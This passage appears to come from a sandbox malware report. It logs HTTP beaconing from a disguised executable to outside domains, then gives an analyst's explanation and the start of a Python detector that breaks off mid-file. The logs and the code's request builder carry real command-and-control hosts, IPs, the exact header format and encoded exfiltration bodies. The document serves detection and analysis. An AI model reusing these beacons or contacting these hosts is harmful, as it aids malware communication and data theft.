                              Sep 16, 2024 09:31:51.620992899 CEST | 730 | IN | Data Raw: 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30
                              Data Ascii: op: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              33 | 192.168.2.5 | 54904 | 43.242.202.169 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:59.019413948 CEST | 724 | OUT | POST /ed2j/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.mizuquan.top
                              Origin: http://www.mizuquan.top
                              Referer: http://www.mizuquan.top/ed2j/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 4b 38 5a 50 68 79 6a 4f 59 38 70 66 76 53 79 4c 44 55 44 63 4d 6e 2f 51 5a 64 54 36 5a 74 2f 51 47 52 2b 66 46 43 62 52 41 37 57 75 46 61 4f 77 52 2b 35 62 66 54 4a 72 44 37 50 68 32 54 62 34 6e 43 4d 79 7a 58 7a 59 75 71 4e 6b 37 77 42 30 43 7a 52 75 55 65 38 58 30 4d 59 54 66 67 2f 69 66 6c 4c 6e 64 57 6c 37 42 46 5a 42 32 52 45 53 48 79 2f 63 79 48 7a 57 36 43 62 37 6a 6c 79 53 47 74 65 58 35 4d 75 41 74 54 54 30 78 58 6e 6f 33 44 36 68 69 73 54 39 59 68 45 2f 4e 6a 30 36 76 6c 50 70 37 41 53 75 37 35 62 34 5a 53 71 75 65 61 33 6b 4f 6c 61 34 4b 6b 3d
                              Data Ascii: bX=Klwv1EENmccPyK8ZPhyjOY8pfvSyLDUDcMn/QZdT6Zt/QGR+fFCbRA7WuFaOwR+5bfTJrD7Ph2Tb4nCMyzXzYuqNk7wB0CzRuUe8X0MYTfg/iflLndWl7BFZB2RESHy/cyHzW6Cb7jlySGteX5MuAtTT0xXno3D6hisT9YhE/Nj06vlPp7ASu75b4ZSquea3kOla4Kk=
                              Sep 16, 2024 09:31:59.876331091 CEST | 691 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:31:59 GMT
                              Content-Type: text/html
                              Content-Length: 548
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              34 | 192.168.2.5 | 54905 | 43.242.202.169 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:32:01.567409039 CEST | 744 | OUT | POST /ed2j/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.mizuquan.top
                              Origin: http://www.mizuquan.top
                              Referer: http://www.mizuquan.top/ed2j/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 71 4d 5a 66 32 4f 6a 4a 34 38 32 42 2f 53 79 42 6a 55 35 63 4d 72 2f 51 62 77 49 35 76 64 2f 54 6e 68 2b 52 6b 43 62 53 41 37 57 68 6c 62 45 74 42 2f 33 62 66 58 33 72 43 48 50 68 32 48 62 34 6c 61 4d 6e 51 76 77 62 65 71 4c 69 37 77 48 70 53 7a 52 75 55 65 38 58 30 59 79 54 62 4d 2f 69 73 74 4c 6d 34 37 7a 6e 78 46 65 4c 57 52 45 59 58 7a 30 63 79 47 6b 57 2f 61 78 37 67 4e 79 53 47 64 65 5a 49 4d 74 4a 74 54 56 77 78 57 76 70 43 6a 30 35 53 30 45 77 37 30 31 67 4f 58 2b 79 35 49 6c 7a 5a 49 36 39 62 56 6a 6f 4b 61 64 2f 75 37 65 2b 74 31 71 6d 64 79 49 30 6a 36 68 6b 2f 62 47 30 36 49 4c 71 35 6d 65 32 31 38 43
                              Data Ascii: bX=Klwv1EENmccPyqMZf2OjJ482B/SyBjU5cMr/QbwI5vd/Tnh+RkCbSA7WhlbEtB/3bfX3rCHPh2Hb4laMnQvwbeqLi7wHpSzRuUe8X0YyTbM/istLm47znxFeLWREYXz0cyGkW/ax7gNySGdeZIMtJtTVwxWvpCj05S0Ew701gOX+y5IlzZI69bVjoKad/u7e+t1qmdyI0j6hk/bG06ILq5me218C
                              Sep 16, 2024 09:32:02.425764084 CEST | 691 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:32:02 GMT
                              Content-Type: text/html
                              Content-Length: 548
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              35 | 192.168.2.5 | 54906 | 43.242.202.169 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:32:04.110135078 CEST | 1761 | OUT | POST /ed2j/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.mizuquan.top
                              Origin: http://www.mizuquan.top
                              Referer: http://www.mizuquan.top/ed2j/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 71 4d 5a 66 32 4f 6a 4a 34 38 32 42 2f 53 79 42 6a 55 35 63 4d 72 2f 51 62 77 49 35 76 56 2f 54 55 70 2b 65 6a 2b 62 54 41 37 57 6f 46 62 48 74 42 2f 36 62 62 37 7a 72 43 4c 35 68 30 2f 62 71 32 53 4d 6a 52 76 77 41 4f 71 4c 75 62 77 47 30 43 7a 2b 75 55 75 34 58 30 49 79 54 62 4d 2f 69 74 64 4c 77 64 58 7a 6c 78 46 5a 42 32 52 59 53 48 7a 63 63 79 76 52 57 2b 75 4c 36 51 74 79 52 6d 4e 65 55 65 34 74 49 4e 54 58 31 78 58 70 70 43 6d 32 35 53 59 2b 77 34 6f 54 67 4f 2f 2b 79 2f 42 46 69 4c 41 62 76 71 74 39 72 70 69 6b 6d 37 54 46 38 75 4a 78 35 64 32 72 35 42 65 71 6d 6f 6a 71 32 4c 74 59 70 59 36 56 6d 69 6f 49 50 73 73 41 43 76 6d 71 46 77 64 56 31 78 78 6e 47 44 6e 2f 33 33 50 69 43 59 63 6e 33 36 75 63 34 74 69 71 46 55 43 2f 65 51 6a 6c 56 79 52 46 49 2f 6c 2b 39 6c 70 54 45 46 4d 2f 33 31 77 46 79 56 30 6f 39 58 52 50 43 39 68 53 6f 4b 39 2f 4a 49 32 58 68 53 56 30 38 35 38 71 61 69 41 75 58 47 4f 32 46 42 4b 63 30 4c 34 37 4a 33 74 34 76 46 65 [TRUNCATED]
                              Data Ascii: bX= [TRUNCATED]
                              Sep 16, 2024 09:32:04.962973118 CEST | 691 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:32:04 GMT
                              Content-Type: text/html
                              Content-Length: 548
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              36 | 192.168.2.5 | 54907 | 43.242.202.169 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:32:06.704241991 CEST | 462 | OUT | GET /ed2j/?bX=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.mizuquan.top
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:32:07.548497915 CEST | 691 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:32:07 GMT
                              Content-Type: text/html
                              Content-Length: 548
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              37 | 192.168.2.5 | 54908 | 104.207.148.137 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:32:20.735991955 CEST | 721 | OUT | POST /ijno/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.capbear.net
                              Origin: http://www.capbear.net
                              Referer: http://www.capbear.net/ijno/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 4f 6e 58 62 32 55 6f 66 7a 56 32 57 67 32 77 41 61 2f 55 63 5a 4a 69 78 58 33 50 56 55 67 65 37 73 38 31 34 51 73 36 78 6d 63 36 64 65 69 51 52 6f 51 37 6a 6c 2f 72 6d 62 78 32 57 44 77 49 37 39 77 51 74 68 35 44 62 68 4f 46 31 75 51 4d 4a 30 4d 37 51 76 37 63 74 45 30 50 50 54 4f 71 34 76 38 36 2f 6c 4d 33 53 55 50 39 59 33 49 78 69 63 4b 77 63 6a 6a 77 2f 71 34 74 72 36 77 6d 52 43 73 6a 63 55 37 45 79 64 73 6f 55 5a 75 56 73 4a 76 4e 6e 56 4c 64 71 37 59 36 61 47 2f 4a 2b 7a 75 30 33 52 41 74 45 65 54 66 4e 33 66 49 69 51 61 38 54 78 6c 50 77 75 78 41 39 43 2f 4d 5a 45 6d 4b 33 38 6e 30 3d
                              Data Ascii: bX=OnXb2UofzV2Wg2wAa/UcZJixX3PVUge7s814Qs6xmc6deiQRoQ7jl/rmbx2WDwI79wQth5DbhOF1uQMJ0M7Qv7ctE0PPTOq4v86/lM3SUP9Y3IxicKwcjjw/q4tr6wmRCsjcU7EydsoUZuVsJvNnVLdq7Y6aG/J+zu03RAtEeTfN3fIiQa8TxlPwuxA9C/MZEmK38n0=
                              Sep 16, 2024 09:32:21.303719044 CEST | 384 | IN | HTTP/1.1 301 Moved Permanently
                              Server: nginx/1.14.2
                              Date: Mon, 16 Sep 2024 07:32:21 GMT
                              Content-Type: text/html
                              Content-Length: 185
                              Connection: close
                              Location: https://www.capbear.net/ijno/
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              38 | 192.168.2.5 | 54909 | 104.207.148.137 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:32:23.282674074 CEST | 741 | OUT | POST /ijno/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.capbear.net
                              Origin: http://www.capbear.net
                              Referer: http://www.capbear.net/ijno/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 4f 6e 58 62 32 55 6f 66 7a 56 32 57 67 53 30 41 59 63 73 63 65 70 69 2b 63 58 50 56 50 51 65 33 73 39 4a 34 51 74 2b 68 6d 75 65 64 65 47 63 52 70 53 44 6a 67 2f 72 6d 54 52 32 58 48 77 49 67 39 77 73 50 68 35 50 62 68 4e 35 31 75 55 41 4a 30 2f 44 54 39 62 63 6a 49 55 50 4e 4f 65 71 34 76 38 36 2f 6c 4d 69 2f 55 50 31 59 32 37 70 69 66 6f 59 54 34 44 77 38 74 34 74 72 2b 77 6d 56 43 73 6a 36 55 37 30 55 64 76 41 55 5a 76 4a 73 4a 36 68 6f 62 37 64 6b 32 34 37 31 43 2f 38 74 35 65 77 2f 62 6d 6b 35 44 51 6e 6d 2f 4a 6c 49 4b 34 30 37 69 46 6a 49 2b 69 49 4b 54 50 74 77 65 46 61 48 69 77 69 36 4c 43 49 55 45 49 50 65 74 48 44 31 42 55 41 4b 57 4c 6a 4f
                              Data Ascii: bX=OnXb2UofzV2WgS0AYcscepi+cXPVPQe3s9J4Qt+hmuedeGcRpSDjg/rmTR2XHwIg9wsPh5PbhN51uUAJ0/DT9bcjIUPNOeq4v86/lMi/UP1Y27pifoYT4Dw8t4tr+wmVCsj6U70UdvAUZvJsJ6hob7dk2471C/8t5ew/bmk5DQnm/JlIK407iFjI+iIKTPtweFaHiwi6LCIUEIPetHD1BUAKWLjO
                              Sep 16, 2024 09:32:23.858465910 CEST | 384 | IN | HTTP/1.1 301 Moved Permanently
                              Server: nginx/1.14.2
                              Date: Mon, 16 Sep 2024 07:32:23 GMT
                              Content-Type: text/html
                              Content-Length: 185
                              Connection: close
                              Location: https://www.capbear.net/ijno/
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>
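                              The sessions on this page share one shape: a POST to a four-character path carrying a single opaque base64 parameter bX, repeated with Content-Lengths 203, 223 and 1239, then a GET to the same path with bX plus the marker RFRd_=tFLD, every request with Connection: close, a self-referential Referer and the same stale Android 4.4.2 Chrome 44 User-Agent, walked across www.kckartal.xyz, www.mizuquan.top and www.capbear.net, all of which answer 404 or 301 here, so none is confirmed live in this capture. The Python below is an added example, not Joe Sandbox's and not FormBook's code: it parses raw requests of that shape, groups them by Host, and flags a host when the (method, Content-Length) cadence lines up with the other indicators. The header set, the short bodies and the two GET queries are copied from sessions 31 to 39; the three 1239-byte bodies, which the page truncates, are cut to their first 110 characters with Content-Length kept at the captured value; www.kckartal.xyz contributes only its last two steps because its earlier POSTs fall before this section. The parameter names, path length and User-Agent are assumed to be build-specific, so they are indicators to tune rather than constants.

```python
"""Heuristic detector for the HTTP beaconing shape in sessions 31 to 39 of this report.
Added example: neither the sandbox's nor the malware's code. Parameter names, path
length and User-Agent are assumed to be build-specific indicators, not constants."""
import os, re
from collections import defaultdict

REPORT_UA = ("Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36")  # from the capture
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")                 # /h5qr/, /ed2j/, /ijno/
B64_RE = re.compile(r"^[A-Za-z0-9+/]{100,}={0,2}$")       # one opaque base64 blob, no fields
# (method, Content-Length) order observed per host; the GET carries no body.
BEACON_TEMPLATE = [("POST", 203), ("POST", 223), ("POST", 1239), ("GET", None)]

def build_request(method, host, path, body="", query="", content_length=None):
    """Assemble a request with the header set the sample uses (copied from the report)."""
    target = path + (f"?{query}" if query else "")
    lines = [f"{method} {target} HTTP/1.1",
             "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
             "Accept-Language: en-US,en", f"Host: {host}", "Connection: close",
             f"User-Agent: {REPORT_UA}"]
    if method == "POST":
        lines += ["Accept-Encoding: gzip, deflate, br", f"Origin: http://{host}",
                  f"Referer: http://{host}{path}", "Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {content_length or len(body)}", "Cache-Control: max-age=0"]
    return "\r\n".join(lines) + "\r\n\r\n" + body

# Bodies copied from the capture. The 1239-byte ones are truncated on the page, so only their
# first 110 characters are kept and Content-Length is passed explicitly with the captured value.
MIZ_203 = "Klwv1EENmccPyK8ZPhyjOY8pfvSyLDUDcMn/QZdT6Zt/QGR+fFCbRA7WuFaOwR+5bfTJrD7Ph2Tb4nCMyzXzYuqNk7wB0CzRuUe8X0MYTfg/iflLndWl7BFZB2RESHy/cyHzW6Cb7jlySGteX5MuAtTT0xXno3D6hisT9YhE/Nj06vlPp7ASu75b4ZSquea3kOla4Kk="
MIZ_223 = "Klwv1EENmccPyqMZf2OjJ482B/SyBjU5cMr/QbwI5vd/Tnh+RkCbSA7WhlbEtB/3bfX3rCHPh2Hb4laMnQvwbeqLi7wHpSzRuUe8X0YyTbM/istLm47znxFeLWREYXz0cyGkW/ax7gNySGdeZIMtJtTVwxWvpCj05S0Ew701gOX+y5IlzZI69bVjoKad/u7e+t1qmdyI0j6hk/bG06ILq5me218C"
MIZ_1239 = "Klwv1EENmccPyqMZf2OjJ482B/SyBjU5cMr/QbwI5vV/TUp+ej+bTA7WoFbHtB/6bb7zrCL5h0/bq2SMjRvwAOqLubwG0Cz+uUu4X0IyTbM/it"
CAP_203 = "OnXb2UofzV2Wg2wAa/UcZJixX3PVUge7s814Qs6xmc6deiQRoQ7jl/rmbx2WDwI79wQth5DbhOF1uQMJ0M7Qv7ctE0PPTOq4v86/lM3SUP9Y3IxicKwcjjw/q4tr6wmRCsjcU7EydsoUZuVsJvNnVLdq7Y6aG/J+zu03RAtEeTfN3fIiQa8TxlPwuxA9C/MZEmK38n0="
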